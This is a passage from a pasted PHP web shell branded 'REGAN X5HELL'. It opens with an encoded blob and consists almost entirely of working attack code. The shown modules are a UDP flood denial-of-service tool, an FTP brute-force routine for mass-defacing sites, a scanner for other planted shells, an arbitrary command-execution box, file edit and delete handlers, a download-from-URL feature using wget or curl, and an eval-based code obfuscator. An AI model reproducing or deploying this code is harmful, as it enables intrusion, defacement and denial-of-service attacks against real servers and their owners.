zFZE9wtOJKXp9tMlMhtOXCbYzwe09wtFmhbShC29VfolVfBA7tm0hkoOifoydbUE9woyZFMy5htO1F2aZRtOXCbYzhTShgWp9tm0hgWpZcbO1FM4IkoOifor7tm0hKX==alVnRPIq
  2104.  
  2105. <?php }
  2106. // x=dos
  2107. elseif(isset($_GET['x']) && ($_GET['x'] == 'dos')){
  2108. // php udp flood ddos
  2109. ?>
  2110. <form action="?rd=<?php echo $pwd; ?>&amp;x=dos" method="post">
  2111.  
  2112. <?php
  2113. if(isset($_GET['host'])&&isset($_GET['time'])){
  2114. $packets = 0;
  2115. ignore_user_abort(TRUE);
  2116. set_time_limit(0);
  2117. $exec_time = $_GET['time'];
  2118. $time = time();
  2119. print "Started: ".time('d-m-y h:i:s')."<br>";
  2120. $max_time = $time+$exec_time;
  2121. $host = $_GET['host'];
  2122. for($i=0;$i<65000;$i++){
  2123. $out .= 'X';
  2124. }
  2125. while(1){
  2126. $packets++;
  2127. if(time() > $max_time){ break; }
  2128. $rand = rand(1,65000);
  2129. $fp = fsockopen('udp://'.$host, $rand, $errno, $errstr, 5);
  2130. if($fp){
  2131. fwrite($fp, $out);
  2132. fclose($fp);
  2133. }
  2134. }
  2135. echo "<br><b>UDP Flood</b><br>
  2136. Completed with $packets (" .round(($packets*65)/1024, 2) . " MB) packets averaging ". round($packets/$exec_time, 2) . " packets per second \n";
  2137.  
  2138. echo '<br><br><form action="'.$surl.'" method=GET><input type="hidden" name="act" value="phptools">
  2139. Host: <br><input type=text name=host><br>
  2140. Length (seconds): <br><input type=text name=time><br>
  2141. <input type=submit value=Go></form>';
  2142. } else {
  2143. echo '<center><form action=? method=GET><input type="hidden" name="act" value="phptools">
  2144. <table class="tabnet" style="width:300px;">
  2145. <tr><th colspan="2">UDP Flood</th></tr>
  2146. <tr><td>&nbsp;&nbsp;Host</td>
  2147. <td><input style="width:220px;" class="inputz" type=text name=host value=></td></tr>
  2148. <tr><td>&nbsp;&nbsp;Length (seconds)</td>
  2149. <td><input style="width:220px;" class="inputz" type=text name=time value=></td></tr>
  2150. <tr><td colspan=2 align=center><input style="width:100%;" class="inputzbut" type="submit" value="Attack !" /></td></tr>
  2151. </table></center>';
  2152. }
  2153. }
  2154.  
  2155.  
  2156. elseif(isset($_GET['x']) && ($_GET['x'] == 'phpinfo')){
  2157. @ob_start();
  2158. @eval("phpinfo();");
  2159. $buff = @ob_get_contents();
  2160. @ob_end_clean();
  2161. $awal = strpos($buff,"<body>")+6;
  2162. $akhir = strpos($buff,"</body>");
  2163. echo "<div class=\"phpinfo\">".substr($buff,$awal,$akhir-$awal)."</div>";
  2164. }
  2165.  
  2166. elseif(isset($_GET['view']) && ($_GET['view'] != "")){
  2167. if(is_file($_GET['view'])){
  2168.  
  2169. if(!isset($file))
  2170. $file = magicboom($_GET['view']);
  2171.  
  2172. if(!$win && $posix){
  2173. $name=@posix_getpwuid(@fileowner($file));
  2174. $group=@posix_getgrgid(@filegroup($file));
  2175. $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
  2176. } else {
  2177. $owner = $user;
  2178. }
  2179. $filn = basename($file);
  2180. echo "<table style=\"margin:6px 0 0 2px;line-height:20px;\">
  2181. <tr><td>Filename</td>
  2182. <td><nobr><span id=\"".clearspace($filn)."_link\">".$file."</span>
  2183. <form action=\"?rd=".$pwd."&amp;view=$file\" method=\"post\" id=\"".clearspace($filn)."_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
  2184. <input type=\"hidden\" name=\"oldname\" value=\"".$filn."\" style=\"margin:0;padding:0;\" />
  2185. <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"".$filn."\" />
  2186. <input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" />
  2187. <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\"
  2188. onclick=\"tukar('".clearspace($filn)."_link','".clearspace($filn)."_form');\" />
  2189. </form></nobr></td></tr>
  2190.  
  2191. <tr><td>Size</td>
  2192. <td>".ukuran($file)."</td></tr>
  2193. <tr><td>Permission</td>
  2194. <td>".get_perms($file)."</td></tr>
  2195. <tr><td>Owner</td>
  2196. <td>".$owner."</td></tr>
  2197. <tr><td>Create time</td>
  2198. <td>".date("d-M-Y H:i",@filectime($file))."</td></tr>
  2199. <tr><td>Last modified</td>
  2200. <td>".date("d-M-Y H:i",@filemtime($file))."</td></tr>
  2201. <tr><td>Last accessed</td>
  2202. <td>".date("d-M-Y H:i",@fileatime($file))."</td></tr>
  2203. <tr><td>Actions</td>
  2204. <td><a href=\"?rd=$pwd&amp;edit=$file\">Edit</a> | <a href=\"javascript:tukar('".clearspace($filn)."_link','".clearspace($filn)."_form');\">Rename</a> | <a href=\"?rd=$pwd&amp;delete=$file\">Delete</a> | <a href=\"?rd=$pwd&amp;dl=$file\">Download</a>&nbsp;(<a href=\"?rd=$pwd&amp;dlgzip=$file\">gzip</a>)</td></tr>
  2205.  
  2206. <tr><td>View</td><td><a href=\"?rd=".$pwd."&amp;view=".$file."&amp;type=code\">Highlight Code</a>
  2207. |
  2208. <a href=\"?rd=".$pwd."&amp;view=".$file."\">Text</a>
  2209. |
  2210. <a href=\"?rd=".$pwd."&amp;view=".$file."&amp;type=image\">image</a></td></tr> </table> ";
  2211.  
  2212. if(isset($_GET['type']) && ($_GET['type']=='image')){
  2213.  
  2214. echo "<div style=\"text-align:center;margin:8px;\">
  2215. <img src=\"?rd=".$pwd."&amp;img=".$filn."\"></div>";
  2216. }
  2217.  
  2218. elseif(isset($_GET['type']) && ($_GET['type']=='code')){
  2219. echo "<div class=\"viewfile\">";
  2220. echo nl2br(htmlentities((@file_get_contents($file))));
  2221. echo "</div>";
  2222.  
  2223. } else {
  2224. echo "<div class=\"viewfile\">";
  2225. $file = wordwrap(@file_get_contents($file),"240","\n");
  2226. @highlight_string($file);
  2227. echo "</div>";
  2228.  
  2229. }
  2230. }
  2231. elseif(is_dir($_GET['view'])) {
  2232. echo showdir($pwd,$prompt);
  2233. }
  2234. }
  2235. elseif(isset($_GET['edit']) && ($_GET['edit'] != "")) {
  2236. if(isset($_POST['save'])) {
  2237. $file = $_POST['saveas'];
  2238. $content = magicboom($_POST['content']);
  2239. if($filez = @fopen($file,"w")) {
  2240. $time = date("d-M-Y H:i",time());
  2241. if(@fwrite($filez,$content)) $msg = "file saved <span class=\"gaya\">@</span> ".$time; else $msg = "failed to save";
  2242. @fclose($filez);
  2243. } else $msg = "permission denied";
  2244. } if
  2245. (!isset($file)) $file = $_GET['edit'];
  2246. if($filez = @fopen($file,"r")) {
  2247. $content = ""; while(!feof($filez)) {
  2248. $content .= htmlentities(str_replace("''","'",fgets($filez)));
  2249. }
  2250. @fclose($filez);
  2251. }
  2252. ?>
  2253.  
  2254.  
  2255. <form action="?rd=<?php echo $pwd; ?>&amp;edit=<?php echo $file; ?>" method="post">
  2256. <table class="cmdbox">
  2257. <tr><td colspan="2">
  2258. <textarea class="output" name="content"><?php echo $content; ?></textarea></td>
  2259. <tr>
  2260. <td colspan="2">Save as <input onMouseOver="this.focus();" id="cmd" class="inputz" type="text" name="saveas" style="width:60%;" value="<?php echo $file; ?>" />
  2261. <input class="inputzbut" type="submit" value="Save !" name="save" style="width:12%;" /> &nbsp;<?php echo $msg; ?></td></tr></table> </form>
  2262.  
  2263. <?php }
  2264. // x=coding
  2265. elseif(isset($_GET['x']) && ($_GET['x'] == 'coding')){
  2266. // encode & decode
  2267. ?>
  2268. <form action="?dm=<?php echo $pwd; ?>&amp;x=coding" method="post">
  2269.  
  2270. <?php {
  2271. echo "<br><br><center><div id=result> <nobr><b><span class='b7'> ENCODE</span> <span class='b8'>DECODE </span></b></nobr><br/><br/>
  2272. <form method='post'><table class=tbl>
  2273. <tr><td>Method : <select name='typed' style='color:red; background-color:black; border:1px solid #666;'>
  2274. <option>Encode</option><option>Decode</decode></select> </td></tr>
  2275. <tr><td>TYPE : <select name='typenc' style='color:red; background-color:black; border:1px solid #666;'>
  2276. <option>GZINFLATE</option><option>GZUNCOMPRESS</option><option>STR_ROT13</option></tr>
  2277. </td>
  2278. <tr><td>
  2279. <textarea spellcheck='false' style='color:#FF0000;background-color:#000000' cols='80' rows='25' name='php_content'></textarea></tr>
  2280. </td></table><hr/><input style='color:#FF0000;background-color:#000000' type='submit' value=' >> ' /><br /><hr /><br /></form></div>";
  2281.  
  2282. $meth_d=$_POST['typed'];
  2283. $typ_d=$_POST['typenc'];
  2284. $c_ntent=$_POST['php_content'];
  2285. $c_ntent=$c_ntent;
  2286. switch($meth_d)
  2287. {
  2288. case "Encode":
  2289. switch($typ_d)
  2290. {
  2291. case "GZINFLATE":
  2292. $res_t=base64_encode(gzdeflate(trim(stripslashes($c_ntent.' '),'<?php, ?>'),9));
  2293. $res_t="<?php eval(gzinflate(base64_decode(\"$res_t\"))); ?>";
  2294. break;
  2295. case "GZUNCOMPRESS":
  2296. $res_t=base64_encode(gzcompress(trim(stripslashes($c_ntent.' '),'<?php, ?>'),9));
  2297. $res_t="<?php eval(gzuncompress(base64_decode(\"$res_t\"))); ?>";
  2298. break;
  2299. case "STR_ROT13":
  2300. $res_t=trim(stripslashes($c_ntent.' '),'<?php, ?>');
  2301. $res_t=base64_encode(str_rot13($res_t));
  2302. $res_t="<?php eval(str_rot13(base64_decode(\"$res_t\"))); ?>";
  2303. break;
  2304. }
  2305. break;
  2306. case "Decode":
  2307. switch($typ_d)
  2308. {
  2309. case "GZINFLATE":
  2310. $res_t=gzinflate(base64_decode($c_ntent));
  2311. break;
  2312. case "GZUNCOMPRESS":
  2313. $res_t=gzuncompress(base64_decode($c_ntent));
  2314. break;
  2315. case "STR_ROT13":
  2316. $res_t=str_rot13(base64_decode($c_ntent));
  2317. break;
  2318. }
  2319. break;
  2320. }
  2321. echo "<center><div id=result><textarea spellcheck='false' style='color:#FF0000;background-color:#000000' cols='80' rows='25'>".htmlspecialchars($res_t)."</textarea></center></div>";
  2322. }
  2323. ?>
  2324.  
  2325. <?php }
  2326. // ********** x=sscan ********** //
  2327. elseif(isset($_GET['x']) && ($_GET['x'] == 'cp2')){
  2328. // cpanel mass deface
  2329. ?>
  2330. <form action="?dm=<?php echo $pwd; ?>&amp;x=cp2" method="post">
  2331.  
  2332. <br/><br/><center><nobr><b><span class='b7'>O=:[ FTP MASS</span> <span class='b8'>DEFACE ]:=O</span></b></nobr><br/><br/>
  2333.  
  2334. <form method="post">
  2335. <center>
  2336. IP Server:<input type="text" name="ip" value="127.0.0.1" />
  2337. <p>&nbsp;</p>
  2338. User's List:<br>
  2339. <textarea rows="10" style="width:35%;" name="users" value="The Users List"></textarea>
  2340. <p>&nbsp;</p>
  2341. Password's List:<br>
  2342. <textarea rows="10" style="width:35%;" name="passwords" value="The Password List"></textarea>
  2343. <p>&nbsp;</p>
  2344. Index File Name:<input type="text" name="index_name" value="index.php" /><br>
  2345. <p>&nbsp;</p>
  2346. Index File Link:<input type="text" name="index_link" value="index.txt" /><br>
  2347. <p>&nbsp;</p>
  2348. <input type="submit" name="forest" value="Mass Deface it" /><br><br>
  2349. </form></center>
  2350.  
  2351. <?php
  2352. set_time_limit(0);
  2353. if(isset($_POST['forest'])){
  2354. $ip=trim($_POST['ip']);
  2355. $users = explode("\n",$_POST["users"]);
  2356. $passwords = explode("\n",$_POST["passwords"]);
  2357. $index_name=trim($_POST['index_name']);$index_link=trim($_POST['index_link']);
  2358.  
  2359. foreach($users as $user){
  2360. foreach($passwords as $pass){
  2361. $connect_ip = ftp_connect($ip) or die("Couldn't Connect To $ip");
  2362. if(@ftp_login($connect_ip, trim($user), trim($pass))){
  2363.  
  2364. echo "<br>Connected To --> $ip@$user\n";@ftp_delete($connect_ip,$index_name);
  2365.  
  2366. $deface = ftp_put($connect_ip, "/public_html/".$index_name , $index_link, FTP_ASCII);
  2367. if($deface){
  2368. echo "<br><font color=green> $user --> Deface Success!!</font>";
  2369. break;
  2370. }else{
  2371. echo "<br><font color=red> $user --> Error Defacing!!</font>";
  2372. }
  2373. }else{
  2374. echo "<br><font color=red>Couldn't Connect To --> $ip@$user --> $pass</font>\n";
  2375. }
  2376. }
  2377. }
  2378. echo "<br><font size=5> ! Mass Defacing Was Done ! </font>";
  2379. }
  2380. ?>
  2381.  
  2382. <?php }
  2383. // x=sscan
  2384. elseif(isset($_GET['x']) && ($_GET['x'] == 'sscan')){
  2385. // shell scanner
  2386. ?>
  2387. <form action="?rd=<?php echo $pwd; ?>&amp;x=sscan" method="post">
  2388.  
  2389. <br><br><center><div id=result> <nobr><b><span class='b7'> SHELL</span> <span class='b8'>SCANNER </span></b></nobr><br/><br/>
  2390.  
  2391. <table><form method='POST'>
  2392. <tr><td>URL TARGET : <input size=40 style='color:#FF0000;background-color:#000000' name='rem_web' value='http://'></td></tr>
  2393. <tr><td><font color=red>INPUT NAMA FILE / SHELL</font></tr></td>
  2394. <tr><td><textarea spellcheck='false' class='textarea_edit' style='color:#FF0000;background-color:#000000' cols=50 rows=30 name='tryzzz'>
  2395.  
  2396. WSO.php
  2397. dz.php
  2398. cpanelcracker.php
  2399. blackshadow.php
  2400. sym.php
  2401. ftpcracker.php
  2402. cpanel.php
  2403. cpn.php
  2404. sql.php
  2405. mysql.php
  2406. madspot.php
  2407. itsecteam_shell.php
  2408. b374k.php
  2409. madsopot.php
  2410. indishell.php
  2411. Cgishell.pl
  2412. killer.php
  2413. changeall.php
  2414. 2.php
  2415. Sh3ll.php
  2416. dz0.php
  2417. dam.php
  2418. user.php
  2419. dom.php
  2420. whmcs.php
  2421. r00t.php
  2422. c99.php
  2423. gaza.php
  2424. q.php
  2425. 1.php
  2426. 2.php
  2427. 3.php
  2428. 4.php
  2429. 5.php
  2430. 6.php
  2431. d0mains.php
  2432. madspotshell.php
  2433. Sym.php
  2434. c22.php
  2435. c100.php
  2436. Cpanel.php
  2437. zone-h.php
  2438. cp.php
  2439. L3b.php
  2440. d.php
  2441. admin1.php
  2442. upload.php
  2443. up.php
  2444. uploads.php
  2445. sa.php
  2446. r57.php
  2447. shell.php
  2448. sa.php
  2449. 404.php
  2450. 403.php
  2451. rwhm.php
  2452. dm0day.php
  2453. exp.php
  2454. Oday.php
  2455. dmshell2014.php
  2456. Exploiter.php
  2457. RDC.php
  2458. autoreg.php
  2459. bforcewhmcs.php
  2460. eqsec.php
  2461. </textarea></td></tr>
  2462. <tr><td><br /><input type='submit' style='color:#FF0000;background-color:#000000' value=' >> SCAN >> ' class='input_big' /><br /><br /></td></tr></form></table><br /><br /><hr /><br /><br />
  2463.  
  2464. <?php
  2465. set_time_limit(0);
  2466. $rtr=array();
  2467. echo "<div id=result><center><table>";
  2468. $webz=$_POST['rem_web'];
  2469. $uri_in=$_POST['tryzzz'];
  2470. $r_xuri = trim($uri_in);
  2471. $r_xuri=explode("\n", $r_xuri);
  2472. foreach($r_xuri as $rty)
  2473. {
  2474. $urlzzx=$webz.$rty;
  2475. if(function_exists('curl_init'))
  2476. {
  2477. echo "<tr><td style='text-align:left'><font color=orange>Checking : </font> <font color=7171C6> $urlzzx </font></td>";
  2478. $ch = curl_init($urlzzx);
  2479. curl_setopt($ch, CURLOPT_NOBODY, true);
  2480. curl_exec($ch);
  2481. $status_code=curl_getinfo($ch, CURLINFO_HTTP_CODE);
  2482. curl_close($ch);
  2483. if($status_code==200)
  2484. {
  2485. echo "<td style='text-align:left'><font color=green> Found....</font></td></tr>";
  2486. } else {
  2487. echo "<td style='text-align:left'><font color=red>Not Found...</font></td></tr>";
  2488. }
  2489. } else {
  2490. echo "<font color=red>cURL Not Found </font>";
  2491. } }
  2492. echo "</table><br /><br /><hr /><br /><br /></div>";
  2493. ?>
  2494.  
  2495.  
  2496. <?php }
  2497. // x=upload
  2498. elseif(isset($_GET['x']) && ($_GET['x'] == 'upload')){
  2499. // upload file
  2500.  
  2501. if(isset($_POST['uploadcomp'])){
  2502. if(is_uploaded_file($_FILES['file']['tmp_name'])){
  2503. $path = magicboom($_POST['path']);
  2504. $fname = $_FILES['file']['name'];
  2505. $tmp_name = $_FILES['file']['tmp_name'];
  2506. $pindah = $path.$fname;
  2507. $stat = @move_uploaded_file($tmp_name,$pindah);
  2508. if ($stat) { $msg = "file uploaded to $pindah"; }
  2509. else $msg = "failed to upload $fname";
  2510. }
  2511. else $msg = "failed to upload $fname";
  2512. }
  2513.  
  2514. elseif(isset($_POST['uploadurl'])){
  2515. $pilihan = trim($_POST['pilihan']);
  2516. $wurl = trim($_POST['wurl']);
  2517. $path = magicboom($_POST['path']);
  2518. $namafile = download($pilihan,$wurl);
  2519. $pindah = $path.$namafile;
  2520. if(is_file($pindah)) { $msg = "file uploaded to DIR $pindah"; }
  2521. else $msg = "failed ! to upload $namafile"; }
  2522. ?>
  2523. <table class="tabnet" style="width:320px;padding:0 1px;">
  2524. <tr><th colspan="2">Upload from URL</th></tr>
  2525. <tr><td colspan="2"><form method="post" style="margin:0;padding:0;" actions="?rd=<?php echo $pwd; ?>&amp;x=upload">
  2526. <table>
  2527. <tr>
  2528. <td>Url</td>
  2529. <td><input class="inputz" type="text" name="wurl" style="width:250px;" value="http://www.some-code/exploits.c"></td></tr>
  2530. <tr><td colspan="2"><input type="text" class="inputz" style="width:99%;" name="path" value="<?php echo $pwd; ?>" /></td></tr>
  2531. <tr><td>
  2532. <select size="1" class="inputz" name="pilihan">
  2533. <option value="wwget">wget</option>
  2534. <option value="wlynx">lynx</option>
  2535. <option value="wfread">fread</option>
  2536. <option value="wfetch">fetch</option>
  2537. <option value="wlinks">links</option>
  2538. <option value="wget">GET</option>
  2539. <option value="wcurl">curl</option>
  2540. </select></td>
  2541. <td colspan="2"><input type="submit" name="uploadurl" class="inputzbut" value="Go !" style="width:246px;"></td></tr>
  2542. </table></form></td> </tr></table>
  2543. <div style="text-align:center;margin:2px;"><?php echo $msg; ?></div>
  2544.  
  2545. <?php }
  2546. elseif(isset($_GET['x']) && ($_GET['x'] == 'shell')) {
  2547. ?>
  2548. <form action="?r=<?php echo $pwd; ?>&amp;x=shell"method="post">
  2549.  
  2550. <table class="cmdbox"> <tr>
  2551. <td colspan="2">
  2552. <textarea class="output"> <?php if(isset($_POST['submitcmd'])) { echo @exe($_POST['cmd']); } ?> </textarea> </td></tr>
  2553.  
  2554. <tr><td colspan="2"><?php echo $prompt; ?><input onMouseOver="this.focus();" id="cmd" class="inputz" type="text" name="cmd" style="width:60%;" value="" /><input class="inputzbut" type="submit" value="Go !" name="submitcmd" style="width:12%;" /></td></tr>
  2555. </table></form>
  2556.  
  2557. <?php }
  2558. // x=gdork
  2559. elseif(isset($_GET['x']) && ($_GET['x'] == 'gdork')){
  2560. // google dork
  2561. ?>
  2562. <form action="?rd=<?php echo $pwd; ?>&amp;x=sscan" method="post">
  2563. <br/><br/><center><nobr><b><span class='b7'>GOOGLE</span> <span class='b8'>DORK</span></b></nobr><br/><br/>
  2564.  
  2565. <form method="post">
  2566. <center>
  2567. <b><u>Sub</u></b><br>client/ manage/ member/ members/ whmcs/ billing/ billings/ support/ help/ secure/ store/ log/ myaccount/ orders/ order/ portal/ mc/ office/ hosting/ user/ sistema/
  2568. <br>
  2569. <b><u>Domain</u></b><br>
  2570. Site: biz .com .info .net .org .pro .name .tv .aero .asia .cat .coop .edu .gov .int .jobs .mil .mobi .museum .tel .travel .ac .ad .ae .af .ag .ai .al .am .an .ao .aq .ar .as .at .au .aw .ax .az .ba .bb .bd .be .bf .bg .bh .bi .bj .bm .bn .bo .br .bs .bt .bv .bw .by .bz .ca .cc .cd .cf .cg .ch .ci .ck .cl .cm .cn .co .cr .cu .cv .cx .cy .cz .de .dj .dk .dm .do .dz .ec .ee .eg .eh .er .es .et .eu .fi .fj .fk .fm .fo .fr .ga .gb .gd .ge .gf .gg .gh .gi .gl .gm .gn .gp .gq .gr .gs .gt .gu .gw .gy .hk .hm .hn .hr .ht .hu .ie .il .im .in .io .iq .ir .is .it .je .jm .jo .jp .ke .kg .kh .ki .km .kn .kp .kr .kw .ky .kz .la .lb .lc .li .lk .lr .ls .lt .lu .lv .ly .ma .mc .md .me .mg .mh .mk .ml .mm .mn .mo .mp .mq .mr .ms .mt .mu .mv .mw .mx .my .mz .na .nc .ne .nf .ng .ni .nl .no .np .nr .nu .nz .om .pa .pe .pf .pg .ph .pk .pl .pm .pn .pr .ps .pt .pw .py .qa .re .ro .rs .ru .rw .sa .sb .sc .sd .se .sg .sh .si .sj .sk .sl .sm .sn .so .sr .st .sv .sy .sz .tc .td .tf .tg .th .tj .tk .tl .tm .tn .to .tr .tt .tv .tw .tz .ua .ug .uk .us .uy .uz .va .vc .ve .vg .vi .vn .vu .wf .ws .ye .yt .yu .za .zm .zw</form></center>
  2571.  
  2572.  
  2573. <?php
  2574. } else {
  2575. if(isset($_GET['delete']) && ($_GET['delete'] != "")){
  2576. $file = $_GET['delete']; @unlink($file);
  2577. }
  2578.  
  2579. elseif(isset($_GET['fdelete']) && ($_GET['fdelete'] != "")){
  2580. delete_option($_GET['fdelete']);
  2581. }
  2582.  
  2583. elseif(isset($_GET['mkdir']) && ($_GET['mkdir'] != "")){
  2584. $path = $pwd.$_GET['mkdir']; @mkdir($path);
  2585. }
  2586. $buff = showdir($pwd,$prompt);
  2587. echo $buff;
  2588. }
  2589. ?>
  2590. </div>
  2591.  
  2592. <div align="center">
  2593. <table class="tabnet" style="width:830px;padding:0 1px;">
  2594. <tr>
  2595. <th colspan="2">
  2596. <center<nobr><span class='b7'>[REGAN BELAJAR</span> <span class='b8'>&COPY; 2014 ]</span></nobr><br>
  2597. <center><blink><a href="?"><b><span class="b1">REGAN</span><span class="b2">X5HELL</span></b></a></blink>
  2598. </th>
  2599. </tr>
  2600. </table>
  2601. </div>
  2602.  
  2603.  
  2604. </center>
  2605. </body>
  2606. </html>
Add Comment
Please, Sign In to add comment